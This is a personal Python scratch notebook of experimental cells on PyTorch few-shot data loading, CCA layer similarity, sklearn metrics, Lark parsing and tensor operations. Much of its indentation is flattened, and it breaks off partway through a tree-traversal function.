# data_path = Path('~/data/').expanduser()
#
# normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
# data_augmentation_transforms = transforms.Compose([
# transforms.RandomResizedCrop(84),
# transforms.RandomHorizontalFlip(),
# transforms.ColorJitter(
# brightness=0.4,
# contrast=0.4,
# saturation=0.4,
# hue=0.2),
# transforms.ToTensor(),
# normalize])
# dataset = miniimagenet(data_path,
# transform=data_augmentation_transforms,
# ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
# print(f'len augmented = {len(dataloader)}')
#
# dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
# print(f'len normal = {len(dataloader)}')
#
# print('success\a')
#
# #%%
#
# import torch
#
# import torchvision.transforms as transforms
#
# from torchmeta.datasets.helpers import miniimagenet
# from torchmeta.utils.data import BatchMetaDataLoader
#
# from tqdm import tqdm
#
# from pathlib import Path
#
# meta_split = 'train'
# data_path = Path('~/data/').expanduser()
#
# # normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
# # data_augmentation_transforms = transforms.Compose([
# # transforms.RandomResizedCrop(84),
# # transforms.RandomHorizontalFlip(),
# # transforms.ColorJitter(
# # brightness=0.4,
# # contrast=0.4,
# # saturation=0.4,
# # hue=0.2),
# # transforms.ToTensor(),
# # normalize])
# # dataset = miniimagenet(data_path,
# # transform=data_augmentation_transforms,
# # ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# # dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
# # print(f'len augmented = {len(dataloader)}')
#
# dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
# print(f'len normal = {len(dataloader)}')
#
# num_batches = 10
# with tqdm(dataloader, total=num_batches) as pbar:
# for batch_idx, batch in enumerate(pbar):
# train_inputs, train_targets = batch["train"]
# print(train_inputs.size())
# # print(batch_idx)
# if batch_idx >= num_batches:
# break
#
# print('success\a')
#
# #%%
#
# from math import comb
#
# total_classes = 64
# n = 5
# number_tasks = comb(total_classes, n)
# print(number_tasks)
#
# #%%
#
# # saving a json file save json file
# # human readable pretty print https://stackoverflow.com/questions/12943819/how-to-prettyprint-a-json-file
#
# import json
#
# data = 'data string'
# with open('data.txt', 'w') as outfile:
# json.dump(data, outfile)
#
# # json.dump(data, open('data.txt', 'w'))
#
# # with open(current_logs_path / 'experiment_stats.json', 'w+') as f:
# # json.dump(self.stats, f)
# # data_ars = {key:value for (key,value) in dictonary.items()}
# # x = {key:str(value) for (key,value) in args.__dict__.items()}
#
# with open(args.current_logs_path / 'args.json', 'w+') as argsfile:
# args_data = {key: str(value) for (key, value) in args.__dict__.items()}
# json.dump(args_data, argsfile, indent=4)
#
# #%%
#
# # get gpu model as string: https://stackoverflow.com/questions/64526139/how-does-one-get-the-model-of-the-gpu-in-python-and-save-it-as-a-string
#
# #%%
#
#
# image = PILI.open(self.images[idx]).convert('RGB')
# %%
# get gpu model as string: https://stackoverflow.com/questions/64526139/how-does-one-get-the-model-of-the-gpu-in-python-and-save-it-as-a-string
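# a minimal sketch (assumes CUDA is available; guarded so it also runs on CPU-only machines)
import torch

if torch.cuda.is_available():
    gpu_name = torch.cuda.get_device_name(0)
    print(gpu_name)
else:
    print('no CUDA device visible')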
# %%
mean = [120.39586422 / 255.0, 115.59361427 / 255.0, 104.54012653 / 255.0]
# [0.47214064400000005, 0.45330829125490196, 0.4099612805098039]
std = [70.68188272 / 255.0, 68.27635443 / 255.0, 72.54505529 / 255.0]
mean2 = [0.485, 0.456, 0.406]
std2 = [0.229, 0.224, 0.225]
print(mean)
print(mean2)
print(mean == mean2)
print(std)
print(std2)
print(std == std2)
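# a minimal sketch of how per-channel stats like the ones above are produced (a random batch stands in
# for the real 0-255 image data)
import torch

batch = torch.randint(0, 256, (32, 3, 84, 84)).float() / 255.0  # N x C x H x W scaled to [0, 1]
flat = batch.permute(1, 0, 2, 3).reshape(3, -1)  # channel first, everything else flattened
print(flat.mean(dim=1))
print(flat.std(dim=1))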
# %%
# references:
# https://stackoverflow.com/questions/20486700/why-we-always-divide-rgb-values-by-255
import numpy as np
from PIL import Image
import glob
import torchvision.transforms as transforms
from pathlib import Path
import os
transform = transforms.Compose([transforms.ToTensor()])
# get image meta-lstm
split = 'val'
root = Path(f'~/data/miniimagenet_meta_lstm/miniImagenet/{split}').expanduser()
labels = sorted(os.listdir(root))
images = [glob.glob(os.path.join(root, label, '*')) for label in labels]
label_idx = 0
img_idx = 0
img = Image.open(images[label_idx][img_idx])  # .convert('RGB')
# check image as 0-255
a = np.asarray(img) # 0-255 image range
print(a)
img = Image.fromarray(a) # from array to img object
print(img)
a2 = np.asarray(img)  # round-trip check: array -> PIL image -> array
print((a == a2).all())
# ToTensor converts a PIL image (or a 0-255 uint8 array) to a float tensor scaled to [0, 1]
img = transform(img)
print(img)
# rfs
# img = np.asarray(self.imgs[item]).astype('uint8')
# meta-lstm
# images = [glob.glob(os.path.join(root, label, '*')) for label in self.labels]
# image = PILI.open(self.images[idx]).convert('RGB')
# %%
from tqdm import tqdm
train_iters = 2
with tqdm(range(train_iters), total=train_iters) as pbar_epochs:
print(range(train_iters))
print(list(range(train_iters)))
for epoch in pbar_epochs:
print(epoch)
# %%
## sinusoid function
print('Starting Sinusoid cell')
import torchmeta
# from torchmeta.toy import Sinusoid
from torchmeta.utils.data import BatchMetaDataLoader
# from torchmeta.transforms import ClassSplitter
# from tqdm import tqdm
batch_size = 16
shots = 5
test_shots = 15
dataset = torchmeta.toy.helpers.sinusoid(shots=shots, test_shots=test_shots)
dataloader = BatchMetaDataLoader(dataset, batch_size=batch_size, num_workers=4)
# print(f'batch_size = {batch_size}')
# print(f'len(dataloader) = {len(dataloader)}\n')
# for batch_idx, batch in enumerate(dataloader):
# print(f'batch_idx = {batch_idx}')
# train_inputs, train_targets = batch['train']
# test_inputs, test_targets = batch['test']
# print(f'train_inputs.shape = {train_inputs.shape}')
# print(f'train_targets.shape = {train_targets.shape}')
# print(f'test_inputs.shape = {test_inputs.shape}')
# print(f'test_targets.shape = {test_targets.shape}')
# if batch_idx >= 1: # halt after 2 iterations
# break
# two tasks are different
dl = enumerate(dataloader)
_, x1 = next(dl)
x1, _ = x1['train']
print(f'x1 = {x1.sum()}')
_, x2 = next(dl)
x2, _ = x2['train']
print(f'x2 = {x2.sum()}')
assert (x1.sum() != x2.sum())
print('assert pass, tasks have different data')
# same task twice
dl = enumerate(dataloader)
_, x1 = next(dl)
x1, _ = x1['train']
print(f'x1 = {x1.sum()}')
dl = enumerate(dataloader)
_, x2 = next(dl)
x2, _ = x2['train']
print(f'x2 = {x2.sum()}')
assert (x1.sum() == x2.sum())
print('DONE\a')
# %%
# https://github.com/tristandeleu/pytorch-meta/issues/69
from torchmeta.toy.helpers import sinusoid
from torchmeta.utils.data import BatchMetaDataLoader
batch_size = 16
shots = 5
test_shots = 15
# Seed the dataset with `seed = 0`
dataset = sinusoid(shots=shots, test_shots=test_shots, seed=0)
# `num_workers = 0` to avoid stochasticity of multiple processes
dataloader = BatchMetaDataLoader(dataset, batch_size=batch_size,
shuffle=False, num_workers=0)
batch = next(iter(dataloader))
inputs, _ = batch['train']
print(f'Sum of inputs: {inputs.sum()}')
# %%
# https://github.com/tristandeleu/pytorch-meta/issues/69
from torchmeta.toy.helpers import sinusoid
from torchmeta.utils.data import BatchMetaDataLoader
import random

def random_hash():
    return random.randrange(1 << 32)
batch_size = 16
shots = 5
test_shots = 15
# Seed the dataset with `seed = 0`
dataset = sinusoid(shots=shots, test_shots=test_shots, seed=0)
dataset.__hash__ = random_hash
# `num_workers = 0` to avoid stochasticity of multiple processes
dataloader = BatchMetaDataLoader(dataset, batch_size=batch_size,
shuffle=False, num_workers=0)
batch = next(iter(dataloader))
inputs, _ = batch['train']
print(f'Sum of inputs: {inputs.sum()}')
# %%
# https://github.com/tristandeleu/pytorch-meta/issues/69
from torchmeta.toy.helpers import sinusoid
from torchmeta.utils.data import BatchMetaDataLoader
batch_size = 16
shots = 5
test_shots = 15
dataset = sinusoid(shots=shots, test_shots=test_shots)
# `num_workers = 0` to avoid stochasticity of multiple processes
dataloader = BatchMetaDataLoader(dataset, batch_size=batch_size,
shuffle=False, num_workers=4)
batch = next(iter(dataloader))
inputs, _ = batch['train']
print(f'Sum of inputs: {inputs.sum()}')
# %%
from pathlib import Path
import torch
path = '/home/miranda9/data/dataset_LS_fully_connected_NN_with_BN/meta_set_fully_connected_NN_with_BN_std1_8.0_std2_1.0_noise_std0.1/train/fi_fully_connected_NN_with_BN_norm_f_151.97657775878906'
path = Path(path).expanduser() / 'fi_db.pt'
path = str(path)
# db = torch.load(path)
# torch.jit.load(path)
db = torch.jit.load(str(path))
print(db)
# %%
import torch
import torch.nn as nn
from collections import OrderedDict
fc0 = nn.Linear(in_features=1, out_features=1)
params = [('fc0', fc0)]
mdl = nn.Sequential(OrderedDict(params))
x = torch.tensor([1.0])
y = mdl(x)
print(y)
# %%
# secs per iteration to days
def secs_per_it_2_days(secs_per_it, total_its):
    days = (secs_per_it * total_its) / (60 * 60 * 24)
    print(days)
print('time in days for resnet18_rfs with 1 inner step')
secs_per_it_2_days(4.76, 100000)
print('time in days for resnet18_rfs with 1 inner step')
secs_per_it_2_days(8.19, 100000)
print('time in days for resnet18_rfs with 4 inner steps')
secs_per_it_2_days(16.11, 100000)
print('time in days for synthetic with 1 inner step')
secs_per_it_2_days(46.26, 100000)
print('time in days for synthetic with 1 inner step')
secs_per_it_2_days(3.47, 100000)
print('time in days for synthetic with 1 inner step')
secs_per_it_2_days(2.7, 100000)
print('time in days for synthetic with 1 inner step')
secs_per_it_2_days(5.7, 100000)
print('time in days for synthetic with 1 inner step')
secs_per_it_2_days(46.26, 20000)
print('time in days for synthetic with 1 inner step')
secs_per_it_2_days(2.7, 20_000)
# %%
import torch
import torch.nn as nn
from anatome import SimilarityHook
from collections import OrderedDict
from pathlib import Path
# get init
path_2_init = Path('~/data/logs/logs_Nov17_13-57-11_jobid_416472.iam-pbs/ckpt_file.pt').expanduser()
ckpt = torch.load(path_2_init)
mdl = ckpt['f']
#
Din, Dout = 1, 1
mdl = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
mdl2 = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
#
hook1 = SimilarityHook(mdl, "fc1_l1")
hook2 = SimilarityHook(mdl2, "fc1_l1")
mdl.eval()
mdl2.eval()
#
num_samples_per_task = 100
lb, ub = -1, 1
x = torch.distributions.Uniform(low=lb, high=ub).sample((num_samples_per_task, Din))
with torch.no_grad():
mdl(x)
mdl2(x)
hook1.distance(hook2, size=8)
# %%
import torch
import torch.nn as nn
from anatome import SimilarityHook
from collections import OrderedDict
from pathlib import Path
# get init
path_2_init = Path('~/data/logs/logs_Nov17_13-57-11_jobid_416472.iam-pbs/ckpt_file.pt').expanduser()
ckpt = torch.load(path_2_init)
mdl = ckpt['f']
#
Din, Dout = 1, 1
mdl = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
# with torch.no_grad():
# mdl.fc1_l1.weight.fill_(2.0)
# mdl.fc1_l1.bias.fill_(2.0)
#
hook1 = SimilarityHook(mdl, "fc1_l1")
hook2 = SimilarityHook(mdl, "fc1_l1")
mdl.eval()
# params for doing "good" CCA
iters = 10
num_samples_per_task = 100
size = 8
# start CCA comparison
lb, ub = -1, 1
with torch.no_grad():
for _ in range(iters):
        x = torch.distributions.Uniform(low=lb, high=ub).sample((num_samples_per_task, Din))
mdl(x)
hook1.distance(hook2, size=size)
# %%
import torch
import torch.nn as nn
from anatome import SimilarityHook
from collections import OrderedDict
from pathlib import Path
# get init
# path_2_init = Path('~/data/logs/logs_Nov17_13-57-11_jobid_416472.iam-pbs/ckpt_file.pt').expanduser()
# ckpt = torch.load(path_2_init)
# mdl = ckpt['f']
#
Din, Dout = 1, 1
mdl1 = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU()),
('fc2_l2', nn.Linear(Din, Dout)),
]))
mdl2 = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU()),
('fc2_l2', nn.Linear(Din, Dout)),
]))
with torch.no_grad():
mu = torch.zeros(Din)
# std = 1.25e-2
std = 10
noise = torch.distributions.normal.Normal(loc=mu, scale=std).sample()
# mdl2.fc1_l1.weight.fill_(50.0)
# mdl2.fc1_l1.bias.fill_(50.0)
mdl2.fc1_l1.weight += noise
mdl2.fc1_l1.bias += noise
#
hook1 = SimilarityHook(mdl1, "fc2_l2")
hook2 = SimilarityHook(mdl2, "fc2_l2")
mdl1.eval()
mdl2.eval()
# params for doing "good" CCA
iters = 10
num_samples_per_task = 500
size = 8
# start CCA comparison
lb, ub = -1, 1
with torch.no_grad():
for _ in range(iters):
        x = torch.distributions.Uniform(low=lb, high=ub).sample((num_samples_per_task, Din))
y1 = mdl1(x)
y2 = mdl2(x)
print((y1 - y2).norm(2))
dist = hook1.distance(hook2, size=size)
print(f'dist={dist}')
# %%
a = ("John", "Charles", "Mike")
b = ("Jenny", "Christy", "Monica", "Vicky")
lst = zip(a, b)
lst = list(lst)
print(lst)
# %%
lst = [
[1, 2, 3],
[4, 5, 6],
[7, 8, 9]
]
lst = zip(*lst)
lst = list(lst)
print(lst)
import numpy as np
average_per_layer = [np.average(l) for l in lst]
average_total = np.average(average_per_layer)
print(average_per_layer)
print(average_total)
# %%
import torch
import torch.nn as nn
from anatome import SimilarityHook
from collections import OrderedDict
from pathlib import Path
import copy
# get init
path_2_init = Path('~/data/logs/logs_Nov17_13-57-11_jobid_416472.iam-pbs/ckpt_file.pt').expanduser()
ckpt = torch.load(path_2_init)
mdl = ckpt['f']
mdl1 = mdl
# mdl2 = copy.deepcopy(mdl1)
mdl2 = copy.deepcopy(mdl)
#
Din, Dout = 1, 1
# mdl1 = nn.Sequential(OrderedDict([
# ('fc1_l1', nn.Linear(in_features=1, out_features=300, bias=True)),
# ('bn1_l1', nn.BatchNorm1d(300, eps=1e-05, momentum=0.1, affine=True, track_running_stats=False)),
# ('relu1', nn.ReLU()),
# ('fc2_l1', nn.Linear(in_features=300, out_features=300, bias=True)),
# ('bn2_l1', nn.BatchNorm1d(300, eps=1e-05, momentum=0.1, affine=True, track_running_stats=False)),
# ('relu2', nn.ReLU()),
# ('fc3_l1', nn.Linear(in_features=300, out_features=300, bias=True)),
# ('bn3_l1', nn.BatchNorm1d(300, eps=1e-05, momentum=0.1, affine=True, track_running_stats=False)),
# ('relu3', nn.ReLU()),
# ('fc4_final_l2', nn.Linear(in_features=300, out_features=1, bias=True))
# ]))
# mdl2 = nn.Sequential(OrderedDict([
# ('fc1_l1', nn.Linear(in_features=1, out_features=300, bias=True)),
# ('bn1_l1', nn.BatchNorm1d(300, eps=1e-05, momentum=0.1, affine=True, track_running_stats=False)),
# ('relu1', nn.ReLU()),
# ('fc2_l1', nn.Linear(in_features=300, out_features=300, bias=True)),
# ('bn2_l1', nn.BatchNorm1d(300, eps=1e-05, momentum=0.1, affine=True, track_running_stats=False)),
# ('relu2', nn.ReLU()),
# ('fc3_l1', nn.Linear(in_features=300, out_features=300, bias=True)),
# ('bn3_l1', nn.BatchNorm1d(300, eps=1e-05, momentum=0.1, affine=True, track_running_stats=False)),
# ('relu3', nn.ReLU()),
# ('fc4_final_l2', nn.Linear(in_features=300, out_features=1, bias=True))
# ]))
# with torch.no_grad():
# mu = torch.zeros(Din)
# # std = 1.25e-2
# std = 10
# noise = torch.distributions.normal.Normal(loc=mu, scale=std).sample()
# # mdl2.fc1_l1.weight.fill_(50.0)
# # mdl2.fc1_l1.bias.fill_(50.0)
# mdl2.fc1_l1.weight += noise
# mdl2.fc1_l1.bias += noise
#
# hook1 = SimilarityHook(mdl1, "fc1_l1")
# hook2 = SimilarityHook(mdl2, "fc1_l1")
hook1 = SimilarityHook(mdl1, "fc2_l1")
hook2 = SimilarityHook(mdl2, "fc2_l1")
mdl1.eval()
mdl2.eval()
# params for doing "good" CCA
iters = 10
num_samples_per_task = 500
size = 8
# start CCA comparison
lb, ub = -1, 1
# with torch.no_grad():
# for _ in range(iters):
# # x = torch.torch.distributions.Uniform(low=-1, high=1).sample((15, 1))
# x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples_per_task, Din))
# y1 = mdl1(x)
# y2 = mdl2(x)
# print((y1-y2).norm(2))
for _ in range(iters):
x = torch.torch.distributions.Uniform(low=-1, high=1).sample((15, 1))
# x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples_per_task, Din))
y1 = mdl1(x)
y2 = mdl2(x)
print((y1 - y2).norm(2))
dist = hook1.distance(hook2, size=size)
print(f'dist={dist}')
# %%
from sklearn.metrics import explained_variance_score
y_true = [3, -0.5, 2, 7]
y_pred = [2.5, 0.0, 2, 8]
explained_variance_score(y_true, y_pred)
y_true = [[0.5, 1], [-1, 1], [7, -6]]
y_pred = [[0, 2], [-1, 2], [8, -5]]
ev = explained_variance_score(y_true, y_pred, multioutput='uniform_average')
ev_raw = explained_variance_score(y_true, y_pred, multioutput='raw_values')
ev_weighted = explained_variance_score(y_true, y_pred, multioutput='variance_weighted')
print(ev_raw)
print(ev_weighted)
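# quick sanity check (my own sketch, not from the sklearn docs): explained variance is
# EV = 1 - Var(y_true - y_pred) / Var(y_true), computed per output column and then averaged
import numpy as np
y_true_arr, y_pred_arr = np.asarray(y_true), np.asarray(y_pred)
ev_manual = 1 - (y_true_arr - y_pred_arr).var(axis=0) / y_true_arr.var(axis=0)
print(ev_manual)         # should match ev_raw above
print(ev_manual.mean())  # should match the 'uniform_average' value ev above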
# %%
# `import sklearn.metrics.mean_squared_error as mse` is not possible because mean_squared_error is a function, not a module
# https://stackoverflow.com/questions/40823418/why-cant-i-import-from-a-module-alias
from sklearn.metrics import mean_squared_error
y_true = [3, -0.5, 2, 7]
y_pred = [2.5, 0.0, 2, 8]
mean_squared_error(y_true, y_pred)
y_true = [3, -0.5, 2, 7]
y_pred = [2.5, 0.0, 2, 8]
mean_squared_error(y_true, y_pred, squared=False)
y_true = [[0.5, 1], [-1, 1], [7, -6]]
y_pred = [[0, 2], [-1, 2], [8, -5]]
mean_squared_error(y_true, y_pred)
mean_squared_error(y_true, y_pred, squared=False)
mean_squared_error(y_true, y_pred, multioutput='raw_values')
mean_squared_error(y_true, y_pred, multioutput=[0.3, 0.7])
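# quick sanity check (my own sketch): with multioutput weights the score is just the weighted
# average of the per-column ('raw_values') errors
import numpy as np
raw = mean_squared_error(y_true, y_pred, multioutput='raw_values')
print(raw)
print(np.average(raw, weights=[0.3, 0.7]))  # should equal mean_squared_error(..., multioutput=[0.3, 0.7])
print(mean_squared_error(y_true, y_pred, multioutput=[0.3, 0.7]))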
# %%
import torch
import torch.nn as nn
from anatome import SimilarityHook
from collections import OrderedDict
from pathlib import Path
import copy
#
Din, Dout = 1, 1
mdl1 = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU()),
('fc2_l2', nn.Linear(Din, Dout)),
]))
mdl2 = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU()),
('fc2_l2', nn.Linear(Din, Dout)),
]))
if torch.cuda.is_available():
mdl1 = mdl1.cuda()
mdl2 = mdl2.cuda()
with torch.no_grad():
mu = torch.zeros(Din)
# std = 1.25e-2
std = 10
    noise = torch.distributions.normal.Normal(loc=mu, scale=std).sample()
    # move the noise to the same device as the weights, otherwise the in-place add below fails on GPU
    noise = noise.to(mdl2.fc1_l1.weight.device)
    # mdl2.fc1_l1.weight.fill_(50.0)
    # mdl2.fc1_l1.bias.fill_(50.0)
    mdl2.fc1_l1.weight += noise
    mdl2.fc1_l1.bias += noise
# the layers in these models are named fc1_l1 / out / fc2_l2, so hook a layer that actually exists
hook1 = SimilarityHook(mdl1, "fc2_l2")
hook2 = SimilarityHook(mdl2, "fc2_l2")
mdl1.eval()
mdl2.eval()
# params for doing "good" CCA
iters = 10
num_samples_per_task = 500
size = 8
# start CCA comparison
lb, ub = -1, 1
for _ in range(iters):
x = torch.torch.distributions.Uniform(low=-1, high=1).sample((15, 1))
if torch.cuda.is_available():
x = x.cuda()
# x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples_per_task, Din))
y1 = mdl1(x)
y2 = mdl2(x)
print((y1 - y2).norm(2))
dist = hook1.distance(hook2, size=size)
print(f'dist={dist}')
# %%
# other cca library for layer https://discuss.pytorch.org/t/what-is-a-good-cca-cka-library-for-pytorch-that-works-ideally-with-gpu/104889
# https://github.com/jameschapman19/cca_zoo
# %%
# walrus operator
# https://therenegadecoder.com/code/the-controversy-behind-the-walrus-operator-in-python/
(x := 1)
print(x)
#
from pathlib import Path
path = Path('~/data/coq-hott-dataset-serpi/contrib/HoTTBook.feat').expanduser()
with open(path) as f:
    while line := f.readline():  # read one line at a time (f.read() would grab the whole file at once)
print(line)
#
# [result for x in values if (result := func(x)) < 10]
#
# if result := do_something():
# do_more(result)
# [y := f(x), y ** 2, y ** 3]  # (from the PEP 572 examples; f and x are not defined in this scratch file)
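# small runnable versions of the examples above (f here is just a stand-in function I made up)
f = lambda v: v * 2
values = range(8)
print([result for v in values if (result := f(v)) < 10])  # [0, 2, 4, 6, 8]
print([(y := f(3)), y ** 2, y ** 3])  # [6, 36, 216]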
# %%
from lark import Lark
#
grammar = '''start: WORD "," WORD "!"
%import common.WORD // imports from terminal library
%ignore " " // Disregard spaces in text
'''
# creates the parser
l = Lark(grammar)
print(l.parse("Hello, World!"))
# %%
from lark import Lark
import lark
grammar = """
start: term
term: apply
| const
| free
| var
| bound
| abs
apply: "(apply " term " " term ")"
const: "(const " MYSTR ")"
free: "(free " MYSTR ")"
var: "(var " MYSTR ")"
bound: "(bound " MYSTR ")"
abs: "(abs " MYSTR " " term ")"
MYSTR: LETTER (LETTER | "." | "_" | DIGIT)*
%import common.WORD
%import common.DIGIT
%import common.LETTER
%ignore " "
"""
parser = Lark(grammar)
tree1 = parser.parse(
"(apply (const HOL.Trueprop) (apply (apply (const HOL.implies) (apply (apply (const HOL.conj) (free A)) (free B))) (apply (apply (const HOL.conj) (free B)) (free A))))")
print(parser.parse(
"(apply (const HOL.Trueprop) (apply (apply (const HOL.implies) (apply (apply (const HOL.conj) (free A)) (free B))) (apply (apply (const HOL.conj) (free B)) (free A))))"))
print(tree1.pretty())
class IncreaseAllNumbers(lark.Transformer):
def _call_userfunc(self, tree, children):
# to do I will need to do something to get the type of variables
# because the variables' types are not attached yet
return
def _call_userfunc_token(self, c):
print(c)
IncreaseAllNumbers(visit_tokens=True).transform(tree1)
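# a sketch of the more typical lark.Transformer usage (one method per rule name, applied bottom-up),
# assuming the grammar/parser/tree1 from above; it rebuilds the parsed term as nested python tuples
class TermToTuples(lark.Transformer):
    def const(self, children):
        return ('const', str(children[0]))
    def free(self, children):
        return ('free', str(children[0]))
    def var(self, children):
        return ('var', str(children[0]))
    def bound(self, children):
        return ('bound', str(children[0]))
    def abs(self, children):
        return ('abs', str(children[0]), children[1])
    def apply(self, children):
        return ('apply', children[0], children[1])
    def term(self, children):
        return children[0]
    def start(self, children):
        return children[0]
print(TermToTuples().transform(tree1))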
# %%
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
torch.manual_seed(1)
word_to_ix = {"hello": 0, "world": 1}
embeds = nn.Embedding(2, 5) # 2 words in vocab, 5 dimensional embeddings
print(type(embeds))
lookup_tensor = torch.tensor([word_to_ix["hello"]], dtype=torch.long)
hello_embed = embeds(lookup_tensor)
print(hello_embed)
# %%
my_set = {1, 2, 3}
print(my_set)
print(type(my_set))
print(len(my_set))
print(1 in my_set)
print(my_set.pop())
print(my_set.pop())
print(my_set.pop())
# %%
from collections import defaultdict
lst = [('a', 1), ('b', 2), ('a', 0)]
# collect values for a in one place, collect values for b in another
d = defaultdict(list) # creates a default dict of value to empty list
for k, v in lst:
d[k].append(v)
print(d)
print(dict(d))
lst2 = d.items()
print(sorted(lst2))
# %%
import numpy as np
x = np.random.randn(1, 10)
xx = np.array([x, x]).reshape([2, 10])  # reshape([]) would error; we want a [2, 10] matrix of two observations
print(xx.shape)
c = np.cov(xx)
# %%
import numpy as np
x = np.random.randn(2, 10)
print(x.shape)
c = np.cov(x)
print(c)
print(c.shape)
# %%
import torch
import torch.nn as nn
from collections import OrderedDict
params = OrderedDict([
('fc1', nn.Linear(in_features=4, out_features=4)),
('ReLU1', nn.ReLU()),
('fc2', nn.Linear(in_features=4, out_features=4)),
('ReLU2', nn.ReLU()),
('fc3', nn.Linear(in_features=4, out_features=1)),
])
mdl = nn.Sequential(params)
for name, m in mdl.named_children():
print(f'{name}, {m}')
print()
# for m in mdl.modules():
# print(m)
#
# print()
#
# for name, m in mdl.named_modules():
# print(name)
# print(m)
#
# print()
#
# for name, m in mdl.named_children():
# print(name)
# print(m)
# %%
# Meaning of dimension in pytorch operations: https://discuss.pytorch.org/t/whats-different-between-dim-1-and-dim-0/61094/5
# input tensor of dimensions B x C, B = number of batches, C = number of classes.
B = 8
C = 3
inputs = torch.rand(size=(B, C))
soft_dim0 = torch.softmax(inputs, dim=0)
soft_dim1 = torch.softmax(inputs, dim=1)
print('**** INPUTS ****')
print(inputs)
print(inputs.size())
print('**** SOFTMAX DIM=0 ****')
print(soft_dim0)
print(f'soft_dim0[0, :].sum()={soft_dim0[0, :].sum()}')
print(f'soft_dim0[:, 0].sum()={soft_dim0[:, 0].sum()}')
print(soft_dim0.size())
# print('**** SOFTMAX DIM=1 ****')
# print(soft_dim1)
# %%
# cosine similarity
import torch.nn as nn
dim = 1  # apply cosine across the second dimension/feature dimension
cos = nn.CosineSimilarity(dim=dim) # eps defaults to 1e-8 for numerical stability
k = 4 # number of examples
d = 8 # dimension
x1 = torch.randn(k, d)
x2 = x1 * 3
print(f'x1 = {x1.size()}')
cos_similarity_tensor = cos(x1, x2)
print(cos_similarity_tensor)
print(cos_similarity_tensor.size())
# %%
import torch.nn as nn
def ned(x1, x2, dim=1, eps=1e-8):
ned_2 = 0.5 * ((x1 - x2).var(dim=dim) / (x1.var(dim=dim) + x2.var(dim=dim) + eps))
return ned_2 ** 0.5
def nes(x1, x2, dim=1, eps=1e-8):
return 1 - ned(x1, x2, dim, eps)
dim = 1  # apply cosine across the second dimension/feature dimension
k = 4 # number of examples
d = 8 # dimension of feature space
x1 = torch.randn(k, d)
x2 = x1 * 3
print(f'x1 = {x1.size()}')
ned_tensor = ned(x1, x2, dim=dim)
print(ned_tensor)
print(ned_tensor.size())
print(nes(x1, x2, dim=dim))
# %%
import torch
# trying to convert a list of tensors to a torch.tensor
x = torch.randn(3, 1)
xs = [x, x]
# xs = torch.tensor(xs)
# note: both torch.tensor and torch.as_tensor raise here for a list of multi-element tensors
# ("only one element tensors can be converted to Python scalars") -- see the cat/stack cells below for what works
xs = torch.as_tensor(xs)
# %%
import torch
# trying to convert a list of tensors to a torch.tensor
x = torch.randn(4)
xs = [x.numpy(), x.numpy()]
# xs = torch.tensor(xs)
xs = torch.as_tensor(xs)
print(xs)
print(xs.size())
# %%
import torch
# trying to convert a list of tensors to a torch.tensor
x = torch.randn(4)
xs = [x.numpy(), x.numpy(), x.numpy()]
xs = [xs, xs]
# xs = torch.tensor(xs)
xs = torch.as_tensor(xs)
print(xs)
print(xs.size())
# %%
# You could use torch.cat or torch.stack to create a tensor from the list.
import torch
x = torch.randn(4)
xs = [x, x]
xs = torch.cat(xs)
print(xs.size())
# xs = torch.stack(xs)
# print(xs.size())
# %%
import torch
# stack vs cat
# cat "extends" a list in the given dimension e.g. adds more rows or columns
x = torch.randn(2, 3)
print(f'{x.size()}')
# concatenate along dim 0: more rows (2 -> 6), same number of columns
xnew_from_cat = torch.cat((x, x, x), 0)
print(f'{xnew_from_cat.size()}')
# concatenate along dim 1: more columns (3 -> 9), same number of rows
xnew_from_cat = torch.cat((x, x, x), 1)
print(f'{xnew_from_cat.size()}')
print()
# stack plays the role that append plays for lists: it doesn't change the shape of the original
# tensors but adds a new dimension to the result, so you can recover each original tensor
# by indexing along that new dimension
xnew_from_stack = torch.stack((x, x, x, x), 0)
print(f'{xnew_from_stack.size()}')
xnew_from_stack = torch.stack((x, x, x, x), 1)
print(f'{xnew_from_stack.size()}')
xnew_from_stack = torch.stack((x, x, x, x), 2)
print(f'{xnew_from_stack.size()}')
# by default it stacks along dim 0 (i.e. 'appends at the front')
xnew_from_stack = torch.stack((x, x, x, x))
print(f'{xnew_from_stack.size()}')
print('I like to think of xnew_from_stack as a \"tensor list\" that you can pop from the front')
print()
lst = []
print(f'{x.size()}')
for i in range(10):
    x += i  # say we do something with x at iteration i
    lst.append(x.clone())  # clone! otherwise every list entry aliases the same in-place-modified tensor
# lstt = torch.stack([x for _ in range(10)])
lstt = torch.stack(lst)
print(lstt.size())
print()
# lst = []
# print(f'{x.size()}')
# for i in range(10):
# x += i # say we do something with x at iteration i
# for j in range(11):
# x += j
# lstx
# lst.append(x)
# # lstt = torch.stack([x for _ in range(10)])
# lstt = torch.stack(lst)
# print(lstt.size())
# %%
import torch
# A class that represents an individual node in a
# Binary Tree
class Node:
def __init__(self, val):
self.left = None
self.right = None
self.val = val
# A function to do postorder tree traversal
def print_postorder(root):
